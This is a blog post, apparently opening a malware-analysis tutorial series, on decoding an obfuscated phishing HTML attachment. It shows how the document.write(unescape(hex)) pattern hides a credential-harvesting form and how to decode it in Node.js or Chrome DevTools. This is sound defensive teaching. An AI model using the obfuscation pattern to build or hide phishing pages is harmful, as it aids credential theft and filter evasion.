Let me kick this off by first telling you how much I love phishing emails. I LOVE them. I LOVE seeing 60 phishing emails fly straight through email filters. I LOVE having to inspect each one for the IOC. I LOVE having to dig through Bro logs to check to make sure that person didn't click the link. If this isn't true love, I don't know what is.
I actually don't love any of those things. In fact, most phishing that you'll see is extremely generic and very poorly done. It's almost as if no one knows that the Social Engineering Toolkit exists. Like, Dave Kennedy literally did all the work for them and they still choose to use awful screen cap JPEGs with some fields overlaying them, but I guess that's all beside the point. This XKCD pretty much hits the nail on the head.
The one, single good thing about these babies is that they're great to learn from because they're easy!
This file is available on VirusTotal, so download and follow along!
Figure 1: People actually fall for this. I mean seriously, look how bad this is.
So as an analyst, my main concern with this is really just the IOC. Basically - did the user click the link? Did the user enter their credentials? So, you may be thinking, "Yeah... so I opened Chrome DevTools, inspected the form and lo and behold I see the domain it posts to, namely:
Figure 2: Oh, lookie there! The form posts to that domain.
Awesome news! If we were just analyzing this quickly, we've got our IOC and we can make sure we had no network hits and move on with our merry lives. But how does this thing really work? Let's open this up in a text editor and see what we're working with.
Figure 3: Well, that's pretty nasty looking...
Going through the entire file, it looks like the only thing we really see is
document.write(unescape('insert tons of hex here...');
Let's take a look at what the
Figure 4: Ty for the documentation Microsoft.
unescape to convert all of those hex encoded characters to their ASCII character set equivalents and then writing them to the HTML document, thus building our phishing page that we saw earlier. Let's go ahead and prove this.
We're going to do this two different ways. These are not the only ways, but these are my preferred ways.
unescaping). Now, there's some slight modification to our file that we're going to make. Remove the
document.write() function that is wrapping our
unescape function. We do this because the DOM is not existent inside of Node, unlike the Chrome browser.
Now that we've made our changes to our file contents, let's pop those contents into Node. (Go make yourself some coffee while you wait for it to paste. It's an incredible amount of characters...) Once it's finally finished pasting, go ahead and hit enter.
Figure 5: How easy was that? Yay Node!
document.write()), this text would then be written to the HTML document which renders that ugly phishing page in the browser.
2. Google Chrome
Chrome makes it just as easy! Remember, we're doing the same thing (
unescape('hexencodedchars)). Let's paste our modified script (with
document.write() removed) into the Chrome console and take a look at the results!
Figure 6: Woot! Chrome rocks too!
Same exact results as Node.js. You can even argue it's a little better since it's formatted nicely for us!
Well, I promised an easy one to start with and we got it! Poke around in Node and in the Chrome DevTools and really get acquainted with them. These are going to be the two most important tools we'll be using in this series. (Hint: I use Chrome DevTools EXTENSIVELY!!!) See if you can't find a few more phishing documents and try this same process until you feel comfortable!
I hope you enjoyed the first entry in this series! If you have any questions or comments, feel free to comment below!